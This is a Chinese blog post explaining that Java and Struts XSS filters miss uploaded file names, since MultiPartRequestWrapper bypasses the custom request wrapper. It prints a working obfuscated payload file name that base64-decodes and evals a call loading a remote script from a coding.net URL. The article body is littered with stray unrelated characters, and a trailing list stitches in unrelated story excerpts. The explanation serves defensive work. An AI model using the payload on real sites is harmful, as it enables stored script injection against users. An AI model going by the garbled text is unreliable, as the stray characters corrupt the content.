XSS漏洞--文件名

java處理xss漏洞的方法一般是配個(gè)filter,例如:

chain.doFilter(new XssHttpServletRequestWraper((HttpServletRequest) request), response);

寫(xiě)個(gè)HttpServletRequestWrapper的子類(lèi)XssHttpServletRequestWraper,重寫(xiě)getParameter等方法(過(guò)濾),封裝request,然后繼續(xù)執(zhí)行filter鏈。(這部分會(huì)在之后會(huì)寫(xiě)一篇說(shuō)明)

但是文件名獲取不會(huì)走新寫(xiě)的request包裝包裝器類(lèi)疏橄,如果不加處理闰集,存在存儲(chǔ)型xss漏洞桨螺。

例如:

文件名:<img src=x id=alF1ZXJ5LmdldFNjcmlwdCgiaHR0cHM6Ly9jb2RpbmcubmV0L3UveWFuZ3hpYW9kaS9wL3Rlc3QxL2dpdC9yYXcvbWFzdGVyLzMuanMiKQ onerror=eval(atob(this.id))>2.png"

atob是base64解碼方法恰梢,解碼之后jQuery.getScript("https://coding.net/u/yangxiaodi/p/test1/git/raw/master/3.js")

如果沒(méi)有得到過(guò)濾,前端獲取到文件名渲染時(shí)不經(jīng)過(guò)轉(zhuǎn)義(服務(wù)器存文件時(shí)未改名字)梗掰,會(huì)執(zhí)行js腳本導(dǎo)致xss攻擊嵌言。

下文以struts為例說(shuō)明


struts

流程:1.走自己寫(xiě)的xssfilter,封裝request及穗。?

? ? ? ? ? 2.走struts的filter dispatcher摧茴,dofilter方法中會(huì)調(diào)用prepareDispatcherAndWrapRequest方法,prepare方法中根據(jù)contentType為multipart/form-data埂陆,使用MultiPartRequestWrapper封裝request. 其他情況用StrutsRequestWrapper封裝

?3.使用StrutsRequestWrapper封裝的情況下苛白,調(diào)用getParameter,gerHeader等方法焚虱,都會(huì)經(jīng)過(guò)自己寫(xiě)的filter類(lèi)的购裙。

4.MultiPartRequestWrapper?

public StringgetParameter(String name) {

? ? return ((multi ==null) || (multi.getParameter(name) ==null)) ?super.getParameter(name) :multi.getParameter(name);

}

其中multi中包含文件名的參數(shù),所以獲取文件名不會(huì)走自己寫(xiě)的filter類(lèi)鹃栽。


綜上躏率,文件名需要單獨(dú)處理。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末民鼓,一起剝皮案震驚了整個(gè)濱河市薇芝,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌丰嘉,老刑警劉巖夯到,帶你破解...
    沈念sama閱讀 217,657評(píng)論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異饮亏,居然都是意外死亡耍贾,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,889評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門(mén)克滴,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)逼争,“玉大人,你說(shuō)我怎么就攤上這事劝赔∈慕梗” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,057評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)杂伟。 經(jīng)常有香客問(wèn)我移层,道長(zhǎng),這世上最難降的妖魔是什么赫粥? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,509評(píng)論 1 293
  • 正文 為了忘掉前任观话,我火速辦了婚禮,結(jié)果婚禮上越平,老公的妹妹穿的比我還像新娘频蛔。我一直安慰自己,他們只是感情好秦叛,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,562評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布晦溪。 她就那樣靜靜地躺著,像睡著了一般挣跋。 火紅的嫁衣襯著肌膚如雪三圆。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 51,443評(píng)論 1 302
  • 那天避咆,我揣著相機(jī)與錄音舟肉,去河邊找鬼。 笑死查库,一個(gè)胖子當(dāng)著我的面吹牛路媚,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播膨报,決...
    沈念sama閱讀 40,251評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼磷籍,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了现柠?” 一聲冷哼從身側(cè)響起院领,我...
    開(kāi)封第一講書(shū)人閱讀 39,129評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎够吩,沒(méi)想到半個(gè)月后比然,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,561評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡周循,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,779評(píng)論 3 335
  • 正文 我和宋清朗相戀三年强法,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片湾笛。...
    茶點(diǎn)故事閱讀 39,902評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡饮怯,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出嚎研,到底是詐尸還是另有隱情蓖墅,我是刑警寧澤,帶...
    沈念sama閱讀 35,621評(píng)論 5 345
  • 正文 年R本政府宣布,位于F島的核電站论矾,受9級(jí)特大地震影響教翩,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜贪壳,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,220評(píng)論 3 328
  • 文/蒙蒙 一饱亿、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧闰靴,春花似錦彪笼、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,838評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至膘掰,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間佳遣,已是汗流浹背识埋。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,971評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留零渐,地道東北人窒舟。 一個(gè)月前我還...
    沈念sama閱讀 48,025評(píng)論 2 370
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像诵盼,于是被迫代替她去往敵國(guó)和親惠豺。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,843評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理风宁,服務(wù)發(fā)現(xiàn)洁墙,斷路器,智...
    卡卡羅2017閱讀 134,656評(píng)論 18 139
  • 本文包括:1戒财、Filter簡(jiǎn)介2热监、Filter是如何實(shí)現(xiàn)攔截的?3饮寞、Filter開(kāi)發(fā)入門(mén)4孝扛、Filter的生命周期...
    廖少少閱讀 7,272評(píng)論 3 56
  • 1、不安全的隨機(jī)數(shù)生成幽崩,在CSRF TOKEN生成苦始、password reset token生成等,會(huì)造成toke...
    nightmare丿閱讀 3,694評(píng)論 0 1
  • 之前積累了XSS 有一段時(shí)間慌申,因?yàn)槟壳伴_(kāi)始了一件有趣的工程陌选,需要整合非常多的知識(shí),其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,059評(píng)論 0 16
  • 聽(tīng)完夏の終わり突然腦子里有滿(mǎn)滿(mǎn)的畫(huà)面,想寫(xiě)一首詩(shī)柠贤。 靜悄悄的夏夜 在蟲(chóng)鳴聲中踏著螢火的光 走過(guò)蛙聲一片的稻田 腳步...
    桑怡談知識(shí)變現(xiàn)閱讀 195評(píng)論 0 0